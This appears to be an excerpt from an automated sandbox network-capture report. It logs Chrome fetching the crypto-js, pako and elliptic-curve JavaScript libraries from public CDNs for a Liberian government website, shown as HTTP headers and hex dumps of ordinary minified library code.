                                                                                                                        2025-01-10 13:54:44 UTC1378INData Raw: 74 75 72 6e 20 6e 7d 7d 69 66 28 65 25 64 3d 3d 3d 75 29 7b 63 6f 6e 73 74 20 74 3d 28 65 2d 75 29 2f 64 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 2c 72 29 7b 63 6f 6e 73 74 20 6e 3d 65 2e 6d 75 6c 28 72 2c 73 29 2c 69 3d 65 2e 70 6f 77 28 6e 2c 74 29 2c 6f 3d 65 2e 6d 75 6c 28 72 2c 69 29 2c 61 3d 65 2e 6d 75 6c 28 65 2e 6d 75 6c 28 6f 2c 73 29 2c 69 29 2c 63 3d 65 2e 6d 75 6c 28 6f 2c 65 2e 73 75 62 28 61 2c 65 2e 4f 4e 45 29 29 3b 69 66 28 21 65 2e 65 71 6c 28 65 2e 73 71 72 28 63 29 2c 72 29 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 66 69 6e 64 20 73 71 75 61 72 65 20 72 6f 6f 74 22 29 3b 72 65 74 75 72 6e 20 63 7d 7d 72 65 74 75 72 6e 20 70 28 65 29 7d 42 69 67 49 6e 74 28 39 29 2c 42 69 67 49 6e 74 28 31
                                                                                                                        Data Ascii: turn n}}if(e%d===u){const t=(e-u)/d;return function(e,r){const n=e.mul(r,s),i=e.pow(n,t),o=e.mul(r,i),a=e.mul(e.mul(o,s),i),c=e.mul(o,e.sub(a,e.ONE));if(!e.eql(e.sqr(c),r))throw new Error("Cannot find square root");return c}}return p(e)}BigInt(9),BigInt(1
                                                                                                                        2025-01-10 13:54:44 UTC1378INData Raw: 28 72 2c 74 29 3b 72 65 74 75 72 6e 20 65 2e 65 71 6c 28 6e 2c 65 2e 5a 45 52 4f 29 7c 7c 65 2e 65 71 6c 28 6e 2c 65 2e 4f 4e 45 29 7d 7d 2c 74 2e 6e 4c 65 6e 67 74 68 3d 62 2c 74 2e 46 69 65 6c 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 3d 21 31 2c 73 3d 7b 7d 29 7b 69 66 28 65 3c 3d 69 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 60 45 78 70 65 63 74 65 64 20 46 70 20 4f 52 44 45 52 20 3e 20 30 2c 20 67 6f 74 20 24 7b 65 7d 60 29 3b 63 6f 6e 73 74 7b 6e 42 69 74 4c 65 6e 67 74 68 3a 61 2c 6e 42 79 74 65 4c 65 6e 67 74 68 3a 63 7d 3d 62 28 65 2c 74 29 3b 69 66 28 63 3e 32 30 34 38 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 46 69 65 6c 64 20 6c 65 6e 67 74 68 73 20 6f 76 65 72 20 32 30 34 38 20 62 79 74 65 73 20 61 72 65 20 6e 6f 74
                                                                                                                        Data Ascii: (r,t);return e.eql(n,e.ZERO)||e.eql(n,e.ONE)}},t.nLength=b,t.Field=function(e,t,r=!1,s={}){if(e<=i)throw new Error(`Expected Fp ORDER > 0, got ${e}`);const{nBitLength:a,nByteLength:c}=b(e,t);if(c>2048)throw new Error("Field lengths over 2048 bytes are not
                                                                                                                        2025-01-10 13:54:44 UTC1378INData Raw: 74 20 69 3d 28 65 3d 28 30 2c 6e 2e 65 6e 73 75 72 65 42 79 74 65 73 29 28 22 70 72 69 76 61 74 65 48 61 73 68 22 2c 65 29 29 2e 6c 65 6e 67 74 68 2c 73 3d 62 28 74 29 2e 6e 42 79 74 65 4c 65 6e 67 74 68 2b 38 3b 69 66 28 73 3c 32 34 7c 7c 69 3c 73 7c 7c 69 3e 31 30 32 34 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 60 68 61 73 68 54 6f 50 72 69 76 61 74 65 53 63 61 6c 61 72 3a 20 65 78 70 65 63 74 65 64 20 24 7b 73 7d 2d 31 30 32 34 20 62 79 74 65 73 20 6f 66 20 69 6e 70 75 74 2c 20 67 6f 74 20 24 7b 69 7d 60 29 3b 72 65 74 75 72 6e 20 6c 28 72 3f 28 30 2c 6e 2e 62 79 74 65 73 54 6f 4e 75 6d 62 65 72 4c 45 29 28 65 29 3a 28 30 2c 6e 2e 62 79 74 65 73 54 6f 4e 75 6d 62 65 72 42 45 29 28 65 29 2c 74 2d 6f 29 2b 6f 7d 7d 2c 38 34 36 33 3a 28 65 2c 74
                                                                                                                        Data Ascii: t i=(e=(0,n.ensureBytes)("privateHash",e)).length,s=b(t).nByteLength+8;if(s<24||i<s||i>1024)throw new Error(`hashToPrivateScalar: expected ${s}-1024 bytes of input, got ${i}`);return l(r?(0,n.bytesToNumberLE)(e):(0,n.bytesToNumberBE)(e),t-o)+o}},8463:(e,t


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        3192.168.2.749754151.101.65.2294432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:44 UTC550OUTGET /npm/crypto-js@4.1.1/crypto-js.min.js HTTP/1.1
                                                                                                                        Host: cdn.jsdelivr.net
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        2025-01-10 13:54:44 UTC774INHTTP/1.1 200 OK
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 50839
                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                        Access-Control-Expose-Headers: *
                                                                                                                        Timing-Allow-Origin: *
                                                                                                                        Cache-Control: public, max-age=31536000, s-maxage=31536000, immutable
                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                                                        X-JSD-Version: 4.1.1
                                                                                                                        X-JSD-Version-Type: version
                                                                                                                        ETag: W/"c697-k51s3VUPwdXjbFN5RYwHjdckr9Q"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Age: 901037
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:44 GMT
                                                                                                                        X-Served-By: cache-fra-eddf8230158-FRA, cache-ewr-kewr1740027-EWR
                                                                                                                        X-Cache: HIT, HIT
                                                                                                                        Vary: Accept-Encoding
                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                        2025-01-10 13:54:44 UTC1378INData Raw: 2f 2a 2a 0a 20 2a 20 4d 69 6e 69 66 69 65 64 20 62 79 20 6a 73 44 65 6c 69 76 72 20 75 73 69 6e 67 20 54 65 72 73 65 72 20 76 35 2e 31 39 2e 32 2e 0a 20 2a 20 4f 72 69 67 69 6e 61 6c 20 66 69 6c 65 3a 20 2f 6e 70 6d 2f 63 72 79 70 74 6f 2d 6a 73 40 34 2e 31 2e 31 2f 63 72 79 70 74 6f 2d 6a 73 2e 6a 73 0a 20 2a 0a 20 2a 20 44 6f 20 4e 4f 54 20 75 73 65 20 53 52 49 20 77 69 74 68 20 64 79 6e 61 6d 69 63 61 6c 6c 79 20 67 65 6e 65 72 61 74 65 64 20 66 69 6c 65 73 21 20 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6a 73 64 65 6c 69 76 72 2e 63 6f 6d 2f 75 73 69 6e 67 2d 73 72 69 2d 77 69 74 68 2d 64 79 6e 61 6d 69 63 2d 66 69 6c 65 73 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74
                                                                                                                        Data Ascii: /** * Minified by jsDelivr using Terser v5.19.2. * Original file: /npm/crypto-js@4.1.1/crypto-js.js * * Do NOT use SRI with dynamically generated files! More information: https://www.jsdelivr.com/using-sri-with-dynamic-files */!function(t,e){"object
                                                                                                                        2025-01-10 13:54:44 UTC1378INData Raw: 63 74 69 6f 6e 28 29 7b 65 2e 24 73 75 70 65 72 2e 69 6e 69 74 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2c 65 2e 69 6e 69 74 2e 70 72 6f 74 6f 74 79 70 65 3d 65 2c 65 2e 24 73 75 70 65 72 3d 74 68 69 73 2c 65 7d 2c 63 72 65 61 74 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 65 78 74 65 6e 64 28 29 3b 72 65 74 75 72 6e 20 74 2e 69 6e 69 74 2e 61 70 70 6c 79 28 74 2c 61 72 67 75 6d 65 6e 74 73 29 2c 74 7d 2c 69 6e 69 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 6d 69 78 49 6e 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 20 69 6e 20 74 29 74 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 65 29 26 26 28 74 68 69 73 5b 65 5d 3d 74 5b 65 5d 29 3b 74 2e 68 61 73 4f 77 6e 50 72 6f 70
                                                                                                                        Data Ascii: ction(){e.$super.init.apply(this,arguments)}),e.init.prototype=e,e.$super=this,e},create:function(){var t=this.extend();return t.init.apply(t,arguments),t},init:function(){},mixIn:function(t){for(var e in t)t.hasOwnProperty(e)&&(this[e]=t[e]);t.hasOwnProp
                                                                                                                        2025-01-10 13:54:44 UTC1378INData Raw: 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 77 6f 72 64 73 2c 72 3d 74 2e 73 69 67 42 79 74 65 73 2c 69 3d 5b 5d 2c 6e 3d 30 3b 6e 3c 72 3b 6e 2b 2b 29 7b 76 61 72 20 6f 3d 65 5b 6e 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 6e 25 34 2a 38 26 32 35 35 3b 69 2e 70 75 73 68 28 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6f 29 29 7d 72 65 74 75 72 6e 20 69 2e 6a 6f 69 6e 28 22 22 29 7d 2c 70 61 72 73 65 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 6c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 28 32 35 35 26 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 29 29 3c 3c 32 34 2d 69 25 34 2a 38 3b 72 65 74 75 72 6e 20 6e 65 77 20 63 2e 69 6e 69 74 28 72 2c 65 29 7d
                                                                                                                        Data Ascii: ion(t){for(var e=t.words,r=t.sigBytes,i=[],n=0;n<r;n++){var o=e[n>>>2]>>>24-n%4*8&255;i.push(String.fromCharCode(o))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i++)r[i>>>2]|=(255&t.charCodeAt(i))<<24-i%4*8;return new c.init(r,e)}
                                                                                                                        2025-01-10 13:54:44 UTC1378INData Raw: 77 20 74 2e 69 6e 69 74 28 72 29 2e 66 69 6e 61 6c 69 7a 65 28 65 29 7d 7d 2c 5f 63 72 65 61 74 65 48 6d 61 63 48 65 6c 70 65 72 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 70 2e 48 4d 41 43 2e 69 6e 69 74 28 74 2c 72 29 2e 66 69 6e 61 6c 69 7a 65 28 65 29 7d 7d 7d 29 2c 6f 2e 61 6c 67 6f 3d 7b 7d 29 3b 72 65 74 75 72 6e 20 6f 7d 28 4d 61 74 68 29 3b 72 65 74 75 72 6e 20 65 3d 28 74 3d 63 29 2e 6c 69 62 2c 72 3d 65 2e 42 61 73 65 2c 69 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 28 6e 3d 74 2e 78 36 34 3d 7b 7d 29 2e 57 6f 72 64 3d 72 2e 65 78 74 65 6e 64 28 7b 69 6e 69 74 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 74 68 69 73 2e 68 69 67 68 3d 74 2c 74 68 69 73 2e 6c
                                                                                                                        Data Ascii: w t.init(r).finalize(e)}},_createHmacHelper:function(t){return function(e,r){return new p.HMAC.init(t,r).finalize(e)}}}),o.algo={});return o}(Math);return e=(t=c).lib,r=e.Base,i=e.WordArray,(n=t.x64={}).Word=r.extend({init:function(t,e){this.high=t,this.l
                                                                                                                        2025-01-10 13:54:44 UTC1378INData Raw: 61 72 20 6f 3d 65 5b 6e 3e 3e 3e 32 5d 3e 3e 3e 31 36 2d 6e 25 34 2a 38 26 36 35 35 33 35 3b 69 2e 70 75 73 68 28 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6f 29 29 7d 72 65 74 75 72 6e 20 69 2e 6a 6f 69 6e 28 22 22 29 7d 2c 70 61 72 73 65 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 72 3d 74 2e 6c 65 6e 67 74 68 2c 69 3d 5b 5d 2c 6e 3d 30 3b 6e 3c 72 3b 6e 2b 2b 29 69 5b 6e 3e 3e 3e 31 5d 7c 3d 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6e 29 3c 3c 31 36 2d 6e 25 32 2a 31 36 3b 72 65 74 75 72 6e 20 65 2e 63 72 65 61 74 65 28 69 2c 32 2a 72 29 7d 7d 3b 66 75 6e 63 74 69 6f 6e 20 69 28 74 29 7b 72 65 74 75 72 6e 20 74 3c 3c 38 26 34 32 37 38 32 35 35 33 36 30 7c 74 3e 3e 3e 38 26 31 36 37 31 31 39 33 35 7d 72 2e 55 74 66 31
                                                                                                                        Data Ascii: ar o=e[n>>>2]>>>16-n%4*8&65535;i.push(String.fromCharCode(o))}return i.join("")},parse:function(t){for(var r=t.length,i=[],n=0;n<r;n++)i[n>>>1]|=t.charCodeAt(n)<<16-n%2*16;return e.create(i,2*r)}};function i(t){return t<<8&4278255360|t>>>8&16711935}r.Utf1
                                                                                                                        2025-01-10 13:54:44 UTC1378INData Raw: 69 6f 6e 28 29 7b 76 61 72 20 74 3d 63 2c 65 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 3b 74 2e 65 6e 63 2e 42 61 73 65 36 34 75 72 6c 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 3d 21 30 29 7b 76 61 72 20 72 3d 74 2e 77 6f 72 64 73 2c 69 3d 74 2e 73 69 67 42 79 74 65 73 2c 6e 3d 65 3f 74 68 69 73 2e 5f 73 61 66 65 5f 6d 61 70 3a 74 68 69 73 2e 5f 6d 61 70 3b 74 2e 63 6c 61 6d 70 28 29 3b 66 6f 72 28 76 61 72 20 6f 3d 5b 5d 2c 73 3d 30 3b 73 3c 69 3b 73 2b 3d 33 29 66 6f 72 28 76 61 72 20 61 3d 28 72 5b 73 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 73 25 34 2a 38 26 32 35 35 29 3c 3c 31 36 7c 28 72 5b 73 2b 31 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 28 73 2b 31 29 25 34 2a 38 26 32 35 35 29 3c 3c 38 7c 72 5b 73 2b 32 3e 3e 3e 32 5d 3e 3e
                                                                                                                        Data Ascii: ion(){var t=c,e=t.lib.WordArray;t.enc.Base64url={stringify:function(t,e=!0){var r=t.words,i=t.sigBytes,n=e?this._safe_map:this._map;t.clamp();for(var o=[],s=0;s<i;s+=3)for(var a=(r[s>>>2]>>>24-s%4*8&255)<<16|(r[s+1>>>2]>>>24-(s+1)%4*8&255)<<8|r[s+2>>>2]>>
                                                                                                                        2025-01-10 13:54:44 UTC1378INData Raw: 5b 65 2b 33 5d 2c 5f 3d 74 5b 65 2b 34 5d 2c 76 3d 74 5b 65 2b 35 5d 2c 79 3d 74 5b 65 2b 36 5d 2c 67 3d 74 5b 65 2b 37 5d 2c 42 3d 74 5b 65 2b 38 5d 2c 77 3d 74 5b 65 2b 39 5d 2c 6b 3d 74 5b 65 2b 31 30 5d 2c 6d 3d 74 5b 65 2b 31 31 5d 2c 53 3d 74 5b 65 2b 31 32 5d 2c 78 3d 74 5b 65 2b 31 33 5d 2c 62 3d 74 5b 65 2b 31 34 5d 2c 41 3d 74 5b 65 2b 31 35 5d 2c 48 3d 6f 5b 30 5d 2c 7a 3d 6f 5b 31 5d 2c 43 3d 6f 5b 32 5d 2c 44 3d 6f 5b 33 5d 3b 48 3d 68 28 48 2c 7a 2c 43 2c 44 2c 61 2c 37 2c 73 5b 30 5d 29 2c 44 3d 68 28 44 2c 48 2c 7a 2c 43 2c 63 2c 31 32 2c 73 5b 31 5d 29 2c 43 3d 68 28 43 2c 44 2c 48 2c 7a 2c 64 2c 31 37 2c 73 5b 32 5d 29 2c 7a 3d 68 28 7a 2c 43 2c 44 2c 48 2c 70 2c 32 32 2c 73 5b 33 5d 29 2c 48 3d 68 28 48 2c 7a 2c 43 2c 44 2c 5f 2c 37 2c
                                                                                                                        Data Ascii: [e+3],_=t[e+4],v=t[e+5],y=t[e+6],g=t[e+7],B=t[e+8],w=t[e+9],k=t[e+10],m=t[e+11],S=t[e+12],x=t[e+13],b=t[e+14],A=t[e+15],H=o[0],z=o[1],C=o[2],D=o[3];H=h(H,z,C,D,a,7,s[0]),D=h(D,H,z,C,c,12,s[1]),C=h(C,D,H,z,d,17,s[2]),z=h(z,C,D,H,p,22,s[3]),H=h(H,z,C,D,_,7,
                                                                                                                        2025-01-10 13:54:44 UTC1378INData Raw: 2c 73 5b 35 32 5d 29 2c 44 3d 75 28 44 2c 48 2c 7a 2c 43 2c 70 2c 31 30 2c 73 5b 35 33 5d 29 2c 43 3d 75 28 43 2c 44 2c 48 2c 7a 2c 6b 2c 31 35 2c 73 5b 35 34 5d 29 2c 7a 3d 75 28 7a 2c 43 2c 44 2c 48 2c 63 2c 32 31 2c 73 5b 35 35 5d 29 2c 48 3d 75 28 48 2c 7a 2c 43 2c 44 2c 42 2c 36 2c 73 5b 35 36 5d 29 2c 44 3d 75 28 44 2c 48 2c 7a 2c 43 2c 41 2c 31 30 2c 73 5b 35 37 5d 29 2c 43 3d 75 28 43 2c 44 2c 48 2c 7a 2c 79 2c 31 35 2c 73 5b 35 38 5d 29 2c 7a 3d 75 28 7a 2c 43 2c 44 2c 48 2c 78 2c 32 31 2c 73 5b 35 39 5d 29 2c 48 3d 75 28 48 2c 7a 2c 43 2c 44 2c 5f 2c 36 2c 73 5b 36 30 5d 29 2c 44 3d 75 28 44 2c 48 2c 7a 2c 43 2c 6d 2c 31 30 2c 73 5b 36 31 5d 29 2c 43 3d 75 28 43 2c 44 2c 48 2c 7a 2c 64 2c 31 35 2c 73 5b 36 32 5d 29 2c 7a 3d 75 28 7a 2c 43 2c 44
                                                                                                                        Data Ascii: ,s[52]),D=u(D,H,z,C,p,10,s[53]),C=u(C,D,H,z,k,15,s[54]),z=u(z,C,D,H,c,21,s[55]),H=u(H,z,C,D,B,6,s[56]),D=u(D,H,z,C,A,10,s[57]),C=u(C,D,H,z,y,15,s[58]),z=u(z,C,D,H,x,21,s[59]),H=u(H,z,C,D,_,6,s[60]),D=u(D,H,z,C,m,10,s[61]),C=u(C,D,H,z,d,15,s[62]),z=u(z,C,D
                                                                                                                        2025-01-10 13:54:44 UTC1378INData Raw: 32 30 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 74 68 69 73 2e 5f 68 61 73 68 2e 77 6f 72 64 73 2c 69 3d 72 5b 30 5d 2c 6e 3d 72 5b 31 5d 2c 73 3d 72 5b 32 5d 2c 61 3d 72 5b 33 5d 2c 63 3d 72 5b 34 5d 2c 68 3d 30 3b 68 3c 38 30 3b 68 2b 2b 29 7b 69 66 28 68 3c 31 36 29 6f 5b 68 5d 3d 30 7c 74 5b 65 2b 68 5d 3b 65 6c 73 65 7b 76 61 72 20 6c 3d 6f 5b 68 2d 33 5d 5e 6f 5b 68 2d 38 5d 5e 6f 5b 68 2d 31 34 5d 5e 6f 5b 68 2d 31 36 5d 3b 6f 5b 68 5d 3d 6c 3c 3c 31 7c 6c 3e 3e 3e 33 31 7d 76 61 72 20 66 3d 28 69 3c 3c 35 7c 69 3e 3e 3e 32 37 29 2b 63 2b 6f 5b 68 5d 3b 66 2b 3d 68 3c 32 30 3f 31 35 31 38 35 30 30 32 34 39 2b 28 6e 26 73 7c 7e 6e 26 61 29 3a 68 3c 34 30 3f 31
                                                                                                                        Data Ascii: 20])},_doProcessBlock:function(t,e){for(var r=this._hash.words,i=r[0],n=r[1],s=r[2],a=r[3],c=r[4],h=0;h<80;h++){if(h<16)o[h]=0|t[e+h];else{var l=o[h-3]^o[h-8]^o[h-14]^o[h-16];o[h]=l<<1|l>>>31}var f=(i<<5|i>>>27)+c+o[h];f+=h<20?1518500249+(n&s|~n&a):h<40?1
                                                                                                                        2025-01-10 13:54:44 UTC1378INData Raw: 3e 33 2c 76 3d 68 5b 64 2d 32 5d 2c 79 3d 28 76 3c 3c 31 35 7c 76 3e 3e 3e 31 37 29 5e 28 76 3c 3c 31 33 7c 76 3e 3e 3e 31 39 29 5e 76 3e 3e 3e 31 30 3b 68 5b 64 5d 3d 5f 2b 68 5b 64 2d 37 5d 2b 79 2b 68 5b 64 2d 31 36 5d 7d 76 61 72 20 67 3d 69 26 6e 5e 69 26 6f 5e 6e 26 6f 2c 42 3d 28 69 3c 3c 33 30 7c 69 3e 3e 3e 32 29 5e 28 69 3c 3c 31 39 7c 69 3e 3e 3e 31 33 29 5e 28 69 3c 3c 31 30 7c 69 3e 3e 3e 32 32 29 2c 77 3d 75 2b 28 28 63 3c 3c 32 36 7c 63 3e 3e 3e 36 29 5e 28 63 3c 3c 32 31 7c 63 3e 3e 3e 31 31 29 5e 28 63 3c 3c 37 7c 63 3e 3e 3e 32 35 29 29 2b 28 63 26 6c 5e 7e 63 26 66 29 2b 61 5b 64 5d 2b 68 5b 64 5d 3b 75 3d 66 2c 66 3d 6c 2c 6c 3d 63 2c 63 3d 73 2b 77 7c 30 2c 73 3d 6f 2c 6f 3d 6e 2c 6e 3d 69 2c 69 3d 77 2b 28 42 2b 67 29 7c 30 7d 72 5b
                                                                                                                        Data Ascii: >3,v=h[d-2],y=(v<<15|v>>>17)^(v<<13|v>>>19)^v>>>10;h[d]=_+h[d-7]+y+h[d-16]}var g=i&n^i&o^n&o,B=(i<<30|i>>>2)^(i<<19|i>>>13)^(i<<10|i>>>22),w=u+((c<<26|c>>>6)^(c<<21|c>>>11)^(c<<7|c>>>25))+(c&l^~c&f)+a[d]+h[d];u=f,f=l,l=c,c=s+w|0,s=o,o=n,n=i,i=w+(B+g)|0}r[


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        4192.168.2.749755104.17.25.144432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:44 UTC550OUTGET /ajax/libs/pako/2.0.4/pako.min.js HTTP/1.1
                                                                                                                        Host: cdnjs.cloudflare.com
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        2025-01-10 13:54:44 UTC944INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:44 GMT
                                                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                        Cache-Control: public, max-age=30672000
                                                                                                                        ETag: W/"6102d866-36c3"
                                                                                                                        Last-Modified: Thu, 29 Jul 2021 16:33:42 GMT
                                                                                                                        cf-cdnjs-via: cfworker/kv
                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                        Timing-Allow-Origin: *
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        CF-Cache-Status: MISS
                                                                                                                        Expires: Wed, 31 Dec 2025 13:54:44 GMT
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QfvfyJg5cWfvz8WyM7IMJr3u6cG8a0GvSVELu1RqKbOb5w09JbuHyVcUdn%2BrCWn2xf4o%2FbCmTK4FqaeG8zv0modyMgExJOZa8li1rOkvvYsNwFeK3x1dpiW8YcjXAD0AZRJe1q8a"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Strict-Transport-Security: max-age=15780000
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8ffd29256fad7c88-EWR
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        2025-01-10 13:54:44 UTC425INData Raw: 37 63 30 31 0d 0a 2f 2a 21 20 70 61 6b 6f 20 32 2e 30 2e 34 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 6e 6f 64 65 63 61 2f 70 61 6b 6f 20 40 6c 69 63 65 6e 73 65 20 28 4d 49 54 20 41 4e 44 20 5a 6c 69 62 29 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 65 28 65 78 70 6f 72 74 73 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 65 78 70 6f 72 74 73 22 5d 2c 65 29 3a 65 28 28 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 3f 67
                                                                                                                        Data Ascii: 7c01/*! pako 2.0.4 https://github.com/nodeca/pako @license (MIT AND Zlib) */!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports):"function"==typeof define&&define.amd?define(["exports"],e):e((t="undefined"!=typeof globalThis?g
                                                                                                                        2025-01-10 13:54:44 UTC1369INData Raw: 2c 31 2c 31 2c 31 2c 31 2c 32 2c 32 2c 32 2c 32 2c 33 2c 33 2c 33 2c 33 2c 34 2c 34 2c 34 2c 34 2c 35 2c 35 2c 35 2c 35 2c 30 5d 29 2c 6c 3d 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 5b 30 2c 30 2c 30 2c 30 2c 31 2c 31 2c 32 2c 32 2c 33 2c 33 2c 34 2c 34 2c 35 2c 35 2c 36 2c 36 2c 37 2c 37 2c 38 2c 38 2c 39 2c 39 2c 31 30 2c 31 30 2c 31 31 2c 31 31 2c 31 32 2c 31 32 2c 31 33 2c 31 33 5d 29 2c 6f 3d 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 5b 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 32 2c 33 2c 37 5d 29 2c 68 3d 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 5b 31 36 2c 31 37 2c 31 38 2c 30 2c 38 2c 37 2c 39 2c 36 2c 31 30 2c 35 2c 31 31 2c 34 2c 31 32 2c 33 2c 31 33 2c 32 2c 31 34 2c 31 2c 31 35
                                                                                                                        Data Ascii: ,1,1,1,1,2,2,2,2,3,3,3,3,4,4,4,4,5,5,5,5,0]),l=new Uint8Array([0,0,0,0,1,1,2,2,3,3,4,4,5,5,6,6,7,7,8,8,9,9,10,10,11,11,12,12,13,13]),o=new Uint8Array([0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,3,7]),h=new Uint8Array([16,17,18,0,8,7,9,6,10,5,11,4,12,3,13,2,14,1,15
